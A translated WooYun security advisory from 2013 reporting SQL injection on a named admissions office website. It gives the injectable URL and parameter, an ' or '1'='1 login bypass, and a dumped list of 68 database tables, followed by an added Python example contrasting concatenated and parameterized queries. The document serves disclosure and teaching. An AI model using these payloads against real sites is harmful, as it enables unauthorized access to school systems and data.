Vulnerability summary
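Vulnerability title: SQL injection vulnerability in an admissions office website
Submitted: 2013-08-21 12:20
Fixed: 2013-10-05 12:20
Published: 2013-10-05 12:20
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Vulnerability status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling
Tags:
None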
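Vulnerability details
Disclosure status:
2013-08-21: Details sent to the vendor; awaiting vendor handling
2013-08-26: Vendor confirmed; details disclosed to the vendor only
2013-09-05: Details disclosed to core white hats and experts in related fields
2013-09-15: Details disclosed to regular white hats
2013-09-25: Details disclosed to intern white hats
2013-10-05: Details disclosed to the public
Brief description: SQL injection~
Detailed description:
Injection point: http://www.zsb.pudong-edu.sh.cn/CenterWeb/xjgl/index.asp?SearchValue=%27&LmID=74&submit=%CB%D1%CB%F7
Parameter: SearchValue
PS: The admin login also has a problem: with the username ' or '1'='1 and any password, you can get in.
Proof of vulnerability: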
Database: zhaoshengban
[68 tables]
+------------------------+
| AboutResult            |
| BForum                 |
| BManager               |
| BReply                 |
| BTeam                  |
| BTopic                 |
| CWIS_FunIndex          |
| CWIS_InformationMore   |
| CWIS_InformationReturn |
| CWIS_LM                |
| CWIS_Logs              |
| CWIS_SchoolBaseInfo    |
| CWIS_Style             |
| CenterBigMode          |
| CenterMiddleMode       |
| CenterSubMode          |
| Classes                |
| Department             |
| Educate                |
| EducateType            |
| FForum                 |
| FManager               |
| FReply                 |
| FTeam                  |
| FTopic                 |
| FamousTeacher          |
| FamousTeacherArticle   |
| FileGroups             |
| Files                  |
| GongGao                |
| GradeTable             |
| Grades                 |
| GuestBook              |
| InformationClass       |
| InformationMore        |
| InformationReturn      |
| InformationSub         |
| Investigation          |
| Investigation2         |
| Leader                 |
| LmManage               |
| MessagePut             |
| ModelInfo              |
| News                   |
| NewsPicture            |
| NewsType               |
| Notice                 |
| NoticeReciever         |
| Noticetype             |
| NotifyReciever         |
| NotifyReplay           |
| Notifys                |
| PageInfo               |
| Party                  |
| PartyType              |
| PermissionGroup        |
| PublicList             |
| PublicList_Notify_Log  |
| bmlogin                |
| bmtjdm                 |
| dj                     |
| dm_course_z            |
| dm_session_z           |
| dtproperties           |
| edu                    |
| edutype                |
| jg_js_z                |
| njdm                   |
+------------------------+
Admin back end:
Remediation:
Copyright notice: when reposting, please credit the source: c2c2 @WooYun
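The report does not show the site's ASP code or a fix, so the following is an added example, not code from the report or the affected site. It uses Python's sqlite3 as a stand-in to show why the two inputs named in the report (a lone ' in SearchValue and the username ' or '1'='1) affect a query built by string concatenation and are inert with bound parameters. The table names, column names, sample rows and the login query's clause order are all assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    # The password is stored in plaintext only to keep the sample short.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO admins VALUES ('admin', 'constructed-password');
        CREATE TABLE articles (lm_id INTEGER, title TEXT);
        INSERT INTO articles VALUES (74, 'Enrollment notice 2013');
    """)
    return db

def search_concat(db, search_value, lm_id):
    # Weak: input becomes part of the SQL text, so a lone ' breaks the statement.
    sql = ("SELECT title FROM articles WHERE lm_id = " + str(lm_id) +
           " AND title LIKE '%" + search_value + "%'")
    return [r[0] for r in db.execute(sql)]

def search_param(db, search_value, lm_id):
    # Hardened: placeholders keep input as data; lm_id is forced to an integer.
    sql = "SELECT title FROM articles WHERE lm_id = ? AND title LIKE ?"
    return [r[0] for r in db.execute(sql, (int(lm_id), "%" + search_value + "%"))]

def login_concat(db, username, password):
    # Weak; the clause order is an assumption, the site's real query is not shown.
    sql = ("SELECT COUNT(*) FROM admins WHERE password = '" + password +
           "' AND username = '" + username + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_param(db, username, password):
    # Hardened: the quote characters are compared as literal text.
    sql = "SELECT COUNT(*) FROM admins WHERE password = ? AND username = ?"
    return db.execute(sql, (password, username)).fetchone()[0] > 0

def quote_breaks_concat(db):
    # True when a lone ' makes the concatenated search statement invalid SQL.
    try:
        search_concat(db, "'", 74)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("lone quote breaks concatenated search:", quote_breaks_concat(db))
    print("lone quote via placeholders:", search_param(db, "'", 74))
    print("tautology, concatenated login:", login_concat(db, "' or '1'='1", "x"))
    print("tautology, placeholder login:", login_param(db, "' or '1'='1", "x"))
```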
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-08-26 00:06
Vendor reply:
Latest status: None yet